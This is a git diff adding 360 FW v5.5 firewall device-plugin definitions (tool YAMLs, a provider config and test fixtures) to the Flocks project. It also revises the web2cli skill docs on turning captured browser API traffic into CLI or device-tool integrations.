+        - fw_qos_monitor
+        - fw_tunnel_status_table
+        - fw_tunnel_status_line
+        - fw_vxlan_monitor
+        - fw_observability_call
+        - test
+    type:
+      type: integer
+    period:
+      type: integer
+    flow:
+      type: integer
+    inf_type:
+      type: integer
+    stat_type:
+      type: integer
+    status_type:
+      type: integer
+    page:
+      type: integer
+    length:
+      type: integer
+    method:
+      type: string
+      enum: [GET]
+    path:
+      type: string
+    query:
+      type: object
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: observability
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_policy.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_policy.yaml
new file mode 100644
index 000000000..15581792c
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_policy.yaml
@@ -0,0 +1,79 @@
+name: 360_fw_policy
+description: >
+  360 FW v5.5 策略工具。覆盖防火墙策略、策略组、应用/WEB/防护策略、
+  黑白名单、多域名和 VSYS 等文档中未被跳过的接口。写操作需要确认。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 策略操作名称。
+      enum:
+        - fw_fwpolicy_list
+        - fw_fwpolicy_get
+        - fw_fwpolicy_create
+        - fw_fwpolicy_update
+        - fw_fwpolicy_delete
+        - fw_fwpolicy_state_update
+        - fw_fwpolicy_move
+        - fw_policy_group_list
+        - fw_policy_group_create
+        - fw_policy_group_delete
+        - fw_app_policy_list
+        - fw_app_policy_create
+        - fw_app_policy_delete
+        - fw_web_policy_list
+        - fw_web_policy_create
+        - fw_web_policy_delete
+        - fw_black_list_list
+        - fw_black_list_create
+        - fw_black_list_delete
+        - fw_white_list_list
+        - fw_white_list_create
+        - fw_white_list_delete
+        - fw_multiple_domains_create
+        - fw_multiple_domains_delete
+        - fw_multiple_ids_create
+        - fw_multiple_ids_delete
+        - fw_protect_policy_list
+        - fw_protect_policy_create
+        - fw_protect_policy_delete
+        - fw_protect_policy_enable_update
+        - fw_vsys_create
+        - fw_vsys_update
+        - fw_vsys_delete
+        - fw_policy_call
+        - test
+    name:
+      type: string
+      description: 策略或对象名称。
+    id:
+      type: integer
+      description: 策略 ID。
+    protocol:
+      type: integer
+      description: 协议族，通常 1 表示 IPv4。
+    enable:
+      type: integer
+      enum: [0, 1]
+      description: 启用状态。
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+    path:
+      type: string
+    query:
+      type: object
+    body:
+      type: string
+      description: 完整 JSON payload 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: policy
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_system.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_system.yaml
new file mode 100644
index 000000000..b6e092998
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_system.yaml
@@ -0,0 +1,48 @@
+name: 360_fw_system
+description: >
+  360 FW v5.5 系统与基础状态工具。用于登录检测、系统信息、接口/HA/授权/NTP/syslog
+  等系统类只读查询。
+category: custom
+enabled: true
+requires_confirmation: false
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 系统类操作名称。
+      enum:
+        - fw_check_login
+        - fw_system_info_get
+        - fw_interface_list
+        - fw_interface_get
+        - fw_ha_config_get
+        - fw_ha_config_syn_get
+        - fw_ha_status_all_get
+        - fw_lte_config_get
+        - fw_lte_info_get
+        - fw_loopback_list
+        - fw_ntp_config_get
+        - fw_v0_0_1_ntp_config_get
+        - fw_ntp_key_get
+        - fw_syslog_server_get
+        - fw_v0_0_1_syslog_server_get
+        - fw_log_filter_get
+        - fw_fw_policy_config_get
+        - fw_license_config_get
+        - fw_virtual_route_list
+        - fw_diagnose_get
+        - test
+    name:
+      type: string
+      description: 接口名称等查询条件。
+    query:
+      type: object
+      description: 附加查询参数。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: system
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_vpn_bgp.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_vpn_bgp.yaml
new file mode 100644
index 000000000..df69fd0b1
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_vpn_bgp.yaml
@@ -0,0 +1,85 @@
+name: 360_fw_vpn_bgp
+description: >
+  360 FW v5.5 VPN、隧道状态与 BGP 工具。BGP 子接口需要先满足 bgp_info
+  节点前置条件；现有生产 BGP 节点不应作为临时写入对象。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: VPN/BGP 操作名称。
+      enum:
+        - fw_autoike_list
+        - fw_autoike_create
+        - fw_autoike_delete
+        - fw_phase2ike_create
+        - fw_phase2ike_delete
+        - fw_ipsec_policy_list
+        - fw_ipsec_policy_create
+        - fw_ipsec_policy_delete
+        - fw_ikesa_list
+        - fw_ipsecsa_list
+        - fw_tunnel_status_table
+        - fw_tunnel_status_line
+        - fw_bgp_info_get
+        - fw_bgp_info_create
+        - fw_bgp_info_delete
+        - fw_bgp_network_list
+        - fw_bgp_network_create
+        - fw_bgp_network_delete
+        - fw_bgp_peer_group_list
+        - fw_bgp_peer_group_create
+        - fw_bgp_peer_group_delete
+        - fw_bgp_neighbors_list
+        - fw_bgp_neighbors_create
+        - fw_bgp_neighbors_delete
+        - fw_bgp_access_list_list
+        - fw_bgp_access_list_create
+        - fw_bgp_access_list_delete
+        - fw_bgp_filter_list_list
+        - fw_bgp_filter_list_create
+        - fw_bgp_filter_list_delete
+        - fw_bgp_route_map_list
+        - fw_bgp_route_map_create
+        - fw_bgp_route_map_delete
+        - fw_bgp_map_list_list
+        - fw_bgp_map_list_create
+        - fw_bgp_map_list_delete
+        - fw_bgp_prefix_list_list
+        - fw_bgp_prefix_list_create
+        - fw_bgp_prefix_list_delete
+        - fw_bgp_prefix_policy_list
+        - fw_bgp_prefix_policy_create
+        - fw_bgp_prefix_policy_delete
+        - fw_bgp_import_check_update
+        - fw_bgp_reflector_switch_update
+        - fw_bgp_timer_update
+        - fw_bgp_route_reflector_create
+        - fw_bgp_route_reflector_delete
+        - fw_vpn_bgp_call
+        - test
+    name:
+      type: string
+    ip_vrf_name:
+      type: string
+      description: 虚拟路由器名称，默认 default。
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+    path:
+      type: string
+    query:
+      type: object
+    body:
+      type: string
+      description: 完整 JSON payload 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: vpn_bgp
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_provider.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_provider.yaml
new file mode 100644
index 000000000..58770439b
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_provider.yaml
@@ -0,0 +1,51 @@
+name: "360_fw"
+vendor: "360"
+service_id: "360_fw"
+version: "5.5"
+integration_type: device
+description: >
+  360 FW v5.5 device integration. This plugin adapts the A-series FW RESTful API
+  to Flocks device tools, including system status, objects, policies, network,
+  VPN/BGP, authentication, security objects, observability, and documented raw REST calls.
+description_cn: >
+  360 FW v5.5 防火墙设备接入。按 A 系列 FW RESTful API 文档适配，支持系统状态、
+  对象、策略、网络、VPN/BGP、认证、安全对象、监控观测以及官方 REST 接口调用。
+auth:
+  type: custom
+  flow: login_then_authorization_header
+  login_path: /API/login
+credential_fields:
+  - key: base_url
+    label: 设备 API 地址
+    storage: config
+    config_key: base_url
+    input_type: url
+    default: "https://YOUR_360_FW_HOST/API"
+    required: true
+  - key: username
+    label: 用户名
+    storage: secret
+    config_key: username
+    secret_id: 360_fw_v5_5_username
+    input_type: text
+    required: true
+  - key: password
+    label: 密码
+    storage: secret
+    config_key: password
+    secret_id: 360_fw_v5_5_password
+    input_type: password
+    required: true
+defaults:
+  base_url: "https://YOUR_360_FW_HOST/API"
+  timeout: 30
+  category: custom
+  product_version: "5.5"
+  fw_software_version: "V5.5"
+  version_software: "V5.5R605P000B20240625"
+  verify_ssl: false
+notes: |
+  登录使用 POST /API/login，请求体字段为 user/pwd。成功后将响应顶层
+  authorization 字段作为后续请求的 Authorization header 原样传入，不能添加
+  Bearer 前缀。变更类工具通过 Flocks 官方 requires_confirmation 机制触发确认；
+  分析文档明确跳过的高风险接口由 handler 本地拒绝。
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_test.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_test.yaml
new file mode 100644
index 000000000..3a9ca0e03
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_test.yaml
@@ -0,0 +1,121 @@
+schema_version: 1
+provider: 360_fw
+
+connectivity:
+  tool: 360_fw_system
+  params:
+    action: fw_check_login
+
+fixtures:
+  360_fw_system:
+    - label: "Check login"
+      tags: [smoke, auth]
+      params:
+        action: fw_check_login
+      assert:
+        success: true
+    - label: "Get system info"
+      tags: [smoke, system]
+      params:
+        action: fw_system_info_get
+      assert:
+        success: true
+
+  360_fw_objects:
+    - label: "List address objects"
+      tags: [smoke, objects]
+      params:
+        action: fw_addressobj_list
+      assert:
+        success: true
+    - label: "Create temporary address object"
+      tags: [objects, mutation]
+      params:
+        action: fw_addressobj_create
+        name: flocks_tmp_addr
+        addr: 198.18.0.10
+
+  360_fw_policy:
+    - label: "List firewall policies"
+      tags: [smoke, policy]
+      params:
+        action: fw_fwpolicy_list
+      assert:
+        success: true
+    - label: "List policy groups"
+      tags: [policy]
+      params:
+        action: fw_policy_group_list
+
+  360_fw_network:
+    - label: "List interfaces"
+      tags: [smoke, network]
+      params:
+        action: fw_interface_list
+      assert:
+        success: true
+    - label: "List static routes"
+      tags: [network]
+      params:
+        action: fw_static_route_list
+
+  360_fw_vpn_bgp:
+    - label: "List IKE phase1"
+      tags: [smoke, vpn]
+      params:
+        action: fw_autoike_list
+      assert:
+        success: true
+    - label: "Get BGP default node"
+      tags: [bgp]
+      params:
+        action: fw_bgp_info_get
+
+  360_fw_auth_security:
+    - label: "List user groups"
+      tags: [smoke, auth]
+      params:
+        action: fw_user_group_list
+      assert:
+        success: true
+    - label: "List RADIUS servers"
+      tags: [auth]
+      params:
+        action: fw_radius_list
+
+  360_fw_observability:
+    - label: "Get CPU trend"
+      tags: [smoke, observability]
+      params:
+        action: fw_cpu_state
+        type: 1
+        period: 1
+      assert:
+        success: true
+    - label: "Get interface monitor"
+      tags: [observability]
+      params:
+        action: fw_interface_monitor
+
+  360_fw_api_readonly:
+    - label: "Show API catalog"
+      tags: [smoke, api]
+      params:
+        action: fw_api_catalog
+      assert:
+        success: true
+    - label: "Raw GET sys_info"
+      tags: [api]
+      params:
+        action: fw_call_raw_readonly
+        path: /sys_info
+
+  360_fw_api_mutation:
+    - label: "Unified GET sys_info"
+      tags: [api]
+      params:
+        action: fw_call_api
+        method: GET
+        path: /sys_info
+      assert:
+        success: true
diff --git a/.flocks/plugins/skills/web2cli/SKILL.md b/.flocks/plugins/skills/web2cli/SKILL.md
index b5fdc0fc4..9d6b58a9e 100644
--- a/.flocks/plugins/skills/web2cli/SKILL.md
+++ b/.flocks/plugins/skills/web2cli/SKILL.md
@@ -78,6 +78,24 @@ Task Progress:
 - [ ] Step 11: Summarize generated capability and close only the Web2CLI tab
 ```
 
+Copy this 12-step checklist (it supersedes the 11-step list above) and check off items as you complete them:
+
+```text
+Task Progress:
+- [ ] Step 1: Open or create the target browser tab
+- [ ] Step 2: Wait for required manual login or authorization
+- [ ] Step 3: Inject the Web2CLI capture hook and verify it is installed
+- [ ] Step 4: Perform or ask the user to perform the target page operation
+- [ ] Step 5: Export captured API data from window.__capturedRequests
+- [ ] Step 6: Save browser auth state to auth-state.json
+- [ ] Step 7: Analyze captured web APIs and remove unrelated traffic
+- [ ] Step 8: Decide whether the final asset belongs in a skill or device plugin
+- [ ] Step 9: Generate the target implementation, verify.json, and cli-reference.md
+- [ ] Step 10: Validate the generated CLI or device tool with live auth data
+- [ ] Step 11: Integrate the WebCLI capability into long-term skill/device assets
+- [ ] Step 12: Summarize generated capability and close only the Web2CLI tab
+```
+
 ### 1. 打开浏览器或创建 Tab
 
 ```bash
@@ -274,23 +292,27 @@ jq '.[] | select(.method == "POST") | {url: .url, body: .requestBody}' "$CAPTURE
 
 ### 8. 判断最终产物落点
 
-生成任何 CLI、handler 或最终文件前，必须先判断本次 WebCLI 能力最终应该沉淀到哪里。不要先生成一个孤立 CLI，再在后续步骤才决定是否改成 device tool。
+生成任何 CLI、device tool 或最终文件前，必须先判断本次 WebCLI 能力最终应该沉淀到哪里。不要先生成一个孤立 CLI，再在后续步骤才决定是否改成 device tool。
 
 根据用户目标和场景二选一：
 
-- **通用网站、查询脚本、内部系统操作、非设备页接入**：最终主 CLI 放在 skill 的 `scripts/`，按 `references/cli-in-skill.md` 集成为长期维护的 skill / CLI 资产。
-- **安全设备接入、来自设备接入页、需要出现在设备页配置和调用**：最终主实现放在 `tools/device/<plugin_id>/` 下，按 `references/cli-in-device.md` 生成 `_provider.yaml`、工具 YAML 和 handler。CLI 只可作为可选调试/回归入口，不作为设备运行时主路径。
+- **通用网站、查询脚本、内部系统操作、非设备页接入**：最终主 CLI 放在 skill 的 `scripts/`，按 `references/skill-integration.md` 集成为长期维护的 skill / CLI 资产。
+- **安全设备接入、来自设备接入页、需要出现在设备页配置和调用**：最终主实现放在 `tools/device/<plugin_id>/` 下，按 `references/device-tool-requirements.md` 生成 device plugin，并按 `references/skill-integration.md` 补齐 skill 文档入口。CLI 只可作为可选调试/回归入口，不作为设备运行时主路径。
 
 如果用户目标不清楚，先用 `question` 明确最终落点，再继续生成。
 
 ### 9. 按目标落点生成可验证实现
 
+第 8 步确定的最终落点决定主实现形态：**通用 CLI** 和 **device plugin** 二选一。无论选择哪一种，都必须同时完成 skill 集成；区别在于 CLI 场景的 skill 包含 `scripts/` 主脚本，device 场景的 skill 只沉淀文档入口、浏览器经验、认证恢复和 device tool 使用说明，不在 skill 中放置独立 CLI 主实现。
+
+两种场景共用 `$CAPTURE_ROOT/cli-reference.md`，它既可以记录 CLI 用法，也可以记录 device tool 的参数、能力、验证方式和回归方法。
+
 #### 9.1 通用 CLI / Skill 场景
 
-生成前必须读取并遵循：
+选择通用 CLI 作为主实现时，生成前必须读取并遵循：
 
 - `$WEB2CLI_SKILL/references/cli-requirements.md`
-- `$WEB2CLI_SKILL/references/cli-in-skill.md`
+- `$WEB2CLI_SKILL/references/skill-integration.md`
 
 基于抓包结果、认证状态和用户目标，生成 CLI、验证材料和接口文档。阶段性产物至少包含：
 
@@ -300,15 +322,23 @@ jq '.[] | select(.method == "POST") | {url: .url, body: .requestBody}' "$CAPTURE
 
 如果 `CAPTURE_NAME` 包含 `-` 等不能作为 Python 模块名的字符，生成 CLI 文件名时必须规范化为 `_`，例如 `test-domain_cli.py` 应写为 `test_domain_cli.py`。
 
-随后按 `references/cli-in-skill.md` 将主 CLI 集成到 skill 的 `scripts/`，不要把最终 CLI 保留成一次性抓包文件名。
+随后按 `references/skill-integration.md` 将主 CLI 集成到 skill 的 `scripts/`，并补齐 skill 级文档：
+
+- `$HOME/.flocks/plugins/skills/<name>-use/scripts/<name>_cli.py`
+- `$HOME/.flocks/plugins/skills/<name>-use/references/browser-workflow.md`
+- `$HOME/.flocks/plugins/skills/<name>-use/references/cli-reference.md`
+- `$HOME/.flocks/plugins/skills/<name>-use/SKILL.md`
+
+不要把最终 CLI 保留成一次性抓包文件名。
 
 #### 9.2 安全设备接入场景
 
-生成前必须读取并遵循：
+选择 device plugin 作为主实现时，生成前必须读取并遵循：
 
-- `$WEB2CLI_SKILL/references/cli-in-device.md`
+- `$WEB2CLI_SKILL/references/device-tool-requirements.md`
+- `$WEB2CLI_SKILL/references/skill-integration.md`
 
-基于抓包结果、认证状态和用户目标，生成 device 插件目录：
+基于抓包结果、认证状态和用户目标，生成 device 插件目录、验证材料和接口文档。主实现只落到 device plugin：
 
 - `$HOME/.flocks/plugins/tools/device/<plugin_id>/_provider.yaml`
 - `$HOME/.flocks/plugins/tools/device/<plugin_id>/<domain>.yaml`
@@ -316,14 +346,20 @@ jq '.[] | select(.method == "POST") | {url: .url, body: .requestBody}' "$CAPTURE
 - `$CAPTURE_ROOT/${CAPTURE_NAME}_verify.json`
 - `$CAPTURE_ROOT/cli-reference.md`
 
-安全设备接入场景不要求先生成 `$CAPTURE_ROOT/<normalized_capture_name>_cli.py`。如确实需要 CLI 做调试或回归，可生成可选 CLI，但必须明确它不是设备运行时主路径，且不要和 handler 独立演进出两套认证/请求逻辑。
+同时创建或更新对应产品 skill，但该 skill 不应包含 `scripts/` 主 CLI：
+
+- `$HOME/.flocks/plugins/skills/<name>-use/references/browser-workflow.md`
+- `$HOME/.flocks/plugins/skills/<name>-use/references/cli-reference.md`
+- `$HOME/.flocks/plugins/skills/<name>-use/SKILL.md`
+
+device 场景不要求先生成 `$CAPTURE_ROOT/<normalized_capture_name>_cli.py`，也不要在 skill 的 `scripts/` 下放置一份与 device tool 平行演进的 CLI 主实现。如确实需要 CLI 做调试或回归，只能作为 device plugin 目录下的可选辅助文件，并必须明确它不是设备运行时主路径。
 
 ### 10. 验证与修改
 
 根据第 8 步确定的目标落点验证可用性：
 
 - 通用 CLI / Skill 场景：用生成的 CLI 任意选择一个接口调用测试可用性
-- 安全设备接入场景：用生成的 handler/device tool 或可选 CLI 任意选择一个低风险接口调用测试可用性
+- 安全设备接入场景：用生成的 device tool 或可选 CLI 任意选择一个低风险接口调用测试可用性
 - 认证状态可用性
 - `verify.json` 的输出约束是否满足
 - method、endpoint、query/body/payload 的一致性，必要时根据 `${CAPTURE_NAME}_api.json` 调整
@@ -335,17 +371,17 @@ jq '.[] | select(.method == "POST") | {url: .url, body: .requestBody}' "$CAPTURE
 无论主实现放在哪里，都必须保留 skill 级文档入口，供长期维护、认证恢复、重新抓包和排障使用：
 
 - `references/browser-workflow.md` 必须记录浏览器连接检查、登录步骤、state 保存位置和认证恢复流程
-- `references/cli-reference.md` 必须记录 CLI 或 device handler 的能力、参数、验证方式和回归方法
+- `references/cli-reference.md` 必须记录 CLI 或 device tool 的能力、参数、验证方式和回归方法
 - `SKILL.md` 必须说明当前能力最终落点：`scripts/` 或 `tools/device/<plugin_id>/`
 
-注意：skill 文档入口必选，不等于必须把主 CLI 代码也放进 skill 的 `scripts/`。安全设备接入场景下，主实现应以 device handler 为准。
+注意：skill 文档入口必选，不等于必须把主 CLI 代码也放进 skill 的 `scripts/`。安全设备接入场景下，主实现应以 device tool 为准。
 
 不要只停留在一次性 CLI 或临时抓包结果；最终都要沉淀成可长期维护的资产。
 
 ### 12. summary并关闭浏览器 tab
 
-1. 总结当前生成的 CLI 工具有哪些接口/能力
-2. 确保 CLI 可用后关闭浏览器或 Tab
+1. 总结当前生成的 CLI 或 device tool 有哪些接口/能力
+2. 确保生成的主实现可用后关闭浏览器或 Tab
 
 #### 关闭浏览器或 Tab
 
@@ -397,5 +433,6 @@ else:
 - 登录状态失效：重新登录后再次执行保存状态命令。
 
 ## Reference
-- references/cli-in-device.md 在 skill 集成完成后，将 WebCLI 能力进一步封装为 device 插件
-- references/cli-in-skill.md 将生成的 CLI 集成到 skill 中使用
+- `references/cli-requirements.md`：说明通用 CLI 主实现的生成要求
+- `references/device-tool-requirements.md`：说明 device tool 主实现的生成要求
+- `references/skill-integration.md`：说明 CLI 和 device tool 两种主实现如何接入长期维护的产品 skill
diff --git a/.flocks/plugins/skills/web2cli/references/cli-in-skill.md b/.flocks/plugins/skills/web2cli/references/cli-in-skill.md
deleted file mode 100644
index 97687cdb4..000000000
--- a/.flocks/plugins/skills/web2cli/references/cli-in-skill.md
+++ /dev/null
@@ -1,191 +0,0 @@
-# 生成后的 CLI 如何接入 Skill
-
-> 本文只说明一件事：`web2cli` 已经生成出 CLI 之后，怎样把它整理成可长期维护的 skill 资产。
-
-## 命名约定
-
-落到 skill 时，统一改成**稳定的产品名**：
-
-- skill 目录：`$HOME/.flocks/plugins/skills/<name>-use/`
-- CLI 主脚本：`$HOME/.flocks/plugins/skills/<name>-use/scripts/<name>_cli.py`
-- 默认认证状态：`~/.flocks/browser/<name>/auth-state.json`
-
-约定说明：
-
-- `<name>` 用产品或系统的稳定标识，不用一次性任务名
-- 目录名可以保留 `-`，例如 `tdp-use`
-- Python 脚本名统一用 `_`，例如 `tdp_cli.py`
-- 不要把最终 CLI 保留成 `export_data_cli.py`、`test_capture_cli.py` 这类临时名字
-
-## 放到已有产品 Skill
-
-如果仓库里已经有对应产品 skill，直接把生成结果并入现有 skill：
-
-```bash
-SKILL_ROOT="$HOME/.flocks/plugins/skills/<name>-use"
-
-mkdir -p "$SKILL_ROOT/scripts"
-mkdir -p "$HOME/.flocks/browser/<name>"
-
-cp "$CAPTURE_ROOT/<normalized_capture_name>_cli.py" \
-  "$SKILL_ROOT/scripts/<name>_cli.py"
-
-cp "$CAPTURE_ROOT/auth-state.json" \
-  "$HOME/.flocks/browser/<name>/auth-state.json"
-```
-
-然后补齐这几项：
-
-1. 在 `scripts/config.py` 中把认证状态默认值指向 `~/.flocks/browser/<name>/auth-state.json`
-2. 在 `references/cli-reference.md` 中写清楚 CLI 用法、环境变量和示例
-3. 在 `references/browser-workflow.md` 中写清楚浏览器登录、保存 state、页面入口、稳定操作方式、等待条件和认证恢复流程
-4. 在 `SKILL.md` 中说明什么时候优先走 CLI，什么时候退回浏览器
-
-推荐的配置写法：
-
-```python
-import os
-from pathlib import Path
-
-AUTH_STATE_FILE = Path(
-    os.getenv(
-        "<NAME>_AUTH_STATE",
-        Path.home() / ".flocks" / "browser" / "<name>" / "auth-state.json",
-    )
-)
-```
-
-这样做的好处是：
-
-- 默认行为统一，和现有产品 skill 保持一致
-- 允许用户用环境变量覆盖
-- 生成阶段的临时产物和最终长期使用的认证文件分离
-
-## 生成新的 Skill
-
-如果当前仓库里还没有对应产品 skill，就按下面的最小结构创建：
-
-```text
-$HOME/.flocks/plugins/skills/<name>-use/
-├── SKILL.md
-├── scripts/
-│   ├── <name>_cli.py
-│   └── config.py
-└── references/
-    ├── browser-workflow.md
-    └── cli-reference.md
-```
-
-其中 `SKILL.md` 必须遵守 Flocks 的标准 skill 格式：
-
-- 文件开头必须是 YAML frontmatter，第一行必须为 `---`
-- frontmatter 至少包含 `name` 和 `description`
-- `name` 使用稳定的 skill 标识，推荐与目录名一致，例如 `<name>-use`
-- frontmatter 结束后，再写正文标题、触发条件、模式判断和使用说明
-
-最小模板示例：
-
-```md
----
-name: test-use
-description: 用于查询 Test 测试平台数据，支持通过 CLI 快速查询，认证失效时退回浏览器模式。
----
-
-# Test Use
-
-## 触发条件
-
-- 用户提到 Test 平台
-- 用户需要查询 Test 数据
-
-## 模式判断
-
-### CLI 模式（默认）
-
-- 适用于快速查询和批量读取数据
-
-### 浏览器模式
-
-- 适用于需要页面交互、导出或重新登录的场景
-```
-
-不要把 `SKILL.md` 直接写成普通 Markdown 文档，例如下面这种格式是无效的：
-
-```md
-# Test Use
-```
-
-各文件职责：
-
-- `SKILL.md`：定义触发条件、模式判断、总入口说明
-- `scripts/<name>_cli.py`：承载生成并整理后的 CLI 能力
-- `scripts/config.py`：集中管理 `BASE_URL`、`AUTH_STATE_FILE`、超时、SSL 等默认配置
-- `references/browser-workflow.md`：统一写浏览器登录、保存 state、页面入口、具体操作经验、等待条件与认证恢复流程
-- `references/cli-reference.md`：写 CLI 参数、命令示例、常见查询
-
-新 skill 的原则也一样：先把生成的 CLI 改成稳定文件名，再把临时 `auth-state.json` 切换到全局默认位置 `~/.flocks/browser/<name>/auth-state.json`。
-
-## `browser-workflow.md` 写作指南
-
-`references/browser-workflow.md` 是产品 skill 里统一承载浏览器经验的单文件。凡是已经验证、后续还会复用的浏览器操作经验，都应该优先沉淀到这里，而不是散落在临时对话里。
-
-推荐写入以下内容：
-
-- 固定的登录入口、首页、详情页、导出页 URL
-- 已确认某产品的稳定登录的方法
-- 认证失效识别与恢复步骤
-- 已验证表格、筛选器、分页、弹窗、下载、上传、详情展开等操作的稳定路径
-- 已验证某站点特有的等待条件、重渲染行为、虚拟列表、iframe 或 SPA 交互特征
-- 默认 state 路径，例如 `~/.flocks/browser/<name>/auth-state.json`
-- CLI 与浏览器的分工边界，例如“列表查询优先 CLI，详情预览/导出/人工登录走浏览器”
-- 特定操作的成功经验，失败案例（特定操作失败 2 次以上，最终成功的经验）
-- web2cli 过程中的踩坑、注意事项
-
-不要写入：
-
-- cookie、token、密码、短信码、TOTP 等敏感信息
-- 一次性的 `@eN` ref、临时 tab id、临时 selector、像素坐标
-- 本次任务的操作流水账
-
-## 认证失败怎么处理
-
-CLI 调用出现以下情况时，优先按认证失效处理：
-
-- 返回 `401` 或 `403`
-- 返回内容出现 `Unauthorized`、`login`、未登录、无权限
-- `auth-state.json` 已存在，但请求仍然被重定向到登录页
-
-处理原则：
-
-1. 不要无限重试 CLI
-2. 请求用户重新通过浏览器登录
-3. 登录完成后，重新保存认证状态到默认路径
-4. 再重试一次 CLI
-
-默认认证文件路径固定为：
-
-```bash
-~/.flocks/browser/<name>/auth-state.json
-```
-
-保存方式示例：
-
-```bash
-mkdir -p "$HOME/.flocks/browser/<name>"
-
-# agent-browser 模式
-agent-browser state save "$HOME/.flocks/browser/<name>/auth-state.json"
-
-# 或 cdp-direct / flocks browser 模式
-flocks browser state save "$HOME/.flocks/browser/<name>/auth-state.json"
-```
-
-如果用户重新登录并保存 state 后，CLI 仍然失败，再继续排查：
-
-- `BASE_URL` 是否写错
-- 当前账号是否确实有接口权限
-- 站点是否还有额外 header / token / csrf 依赖
-
-## 一句话原则
-
-`web2cli` 产出的 `<capture_name>_cli.py` 是临时结果；真正沉淀到 skill 时，要改成稳定产品名脚本，并把认证状态统一落到 `~/.flocks/browser/<name>/auth-state.json`。
diff --git a/.flocks/plugins/skills/web2cli/references/device-tool-requirements.md b/.flocks/plugins/skills/web2cli/references/device-tool-requirements.md
new file mode 100644
index 000000000..fd1f2658a
--- /dev/null
+++ b/.flocks/plugins/skills/web2cli/references/device-tool-requirements.md
@@ -0,0 +1,281 @@
+# Web2CLI Device Tool 生成要求
+
+> 本文说明：`web2cli` 已经抓到页面请求后，怎样生成可在设备页识别、配置和调用的 device tool。
+
+## 结论
+
+`device-tool-requirements.md` 说明安全设备场景下如何生成 device plugin 主实现。它不是 `skill-integration.md` 的替代物，也不要求先生成一套独立 CLI 再额外封装 device：
+
+- 所有 `web2cli` 结果都必须完成 skill 集成
+- 安全设备接入场景下，主实现是 `device plugin`，不是 skill `scripts/` 下的 CLI
+- 对应 skill 必须保留 `SKILL.md`、`references/browser-workflow.md` 和 `references/cli-reference.md`，用于记录触发条件、浏览器经验、认证恢复、device tool 能力和验证方法
+- `references/cli-reference.md` 是通用接口文档入口，可记录 CLI，也可记录 device tool 的参数、输出和回归方式
+
+## 何时使用
+
+在以下场景调用本文档：
+
+- 当前任务明确来自“设备接入”页面，目标是把某个安全设备或安全产品接入到设备管理体系
+- 最终产物需要出现在设备页，并允许用户填写实例配置、刷新模板、按 `device_id` 调用
+- 当前 WebCLI 抓到的能力属于安全设备能力，而不是单纯给 skill 复用的站点操作脚本
+
+不优先使用本文档的场景：
+
+- 只是想保留一个可复用 CLI 供 agent 在 skill 中调用
+- 目标不是设备接入，而是某个通用网站的操作自动化、查询脚本或内部工具
+- 暂时只需要沉淀浏览器经验、CLI 参数和认证恢复流程，不需要设备页识别
+
+如果当前任务来自“设备接入”页面，并且目标是安全设备接入，WebCLI 应生成标准 device 插件作为主实现：
+
+```text
+$HOME/.flocks/plugins/tools/device/<plugin_id>/
+├── _provider.yaml
+├── <domain>.yaml
+├── <name>.handler.py
+├── <name>_cli.py        # 可选，仅用于调试/回归
+└── _test.yaml           # 可选，最小验证样例
+```
+
+其中：
+
+- `_provider.yaml`：决定设备页是否能识别该模板，以及用户创建实例时需要填写哪些字段
+- `<domain>.yaml`：定义可调用工具、参数和 action
+- `<name>.handler.py`：设备运行时入口，负责读取配置、认证、发请求、清洗结果
+- `<name>_cli.py`：只作为调试入口保留，不作为设备运行时主路径
+
+认证默认规则：
+
+- 自定义 CLI / WebCLI 默认认证方式为 `cookie/auth-state`：优先复用浏览器保存的 `auth-state.json`，从中按请求域名/path/secure 规则选择 Cookie，并在需要时读取 localStorage
+- 默认认证状态文件：`~/.flocks/browser/<name>/auth-state.json`
+- 优先使用 `auth_state_path` 指向 `~/.flocks/browser/<name>/auth-state.json`
+- 可以额外暴露可选 `username` / `password`，但它们只用于 cookie 失效后的认证恢复，不替代默认的 `auth_state_path`
+- 不要生成或使用 `auth_state_json` / `Legacy Auth State JSON` 这类内联 JSON 字段；设备配置只保存 state 文件路径，不粘贴 state 文件内容
+- 只有在目标站点确实还依赖额外字段时，才补充 `cookie`、`csrf_token`、`access_token` 或特定认证头；这些字段是 `auth_state_path` 之外的补充，不替代默认的 cookie/auth-state
+- 不要把 `cookie` 或 `token` 设计成和 `auth-state` 并列的多个默认入口；如果用户提供的是 state 文件路径，必须写入 `auth_state_path`
+
+## 命名约定
+
+- 插件目录：`$HOME/.flocks/plugins/tools/device/<plugin_id>/`
+- `plugin_id`：推荐使用稳定产品名加版本，例如 `<name>_v1_0_0`
+- `service_id`：推荐使用稳定能力标识，例如 `<name>_device`
+- handler 文件：`<name>.handler.py`
+- 可选 CLI 文件：`<name>_cli.py`
+
+约定说明：
+
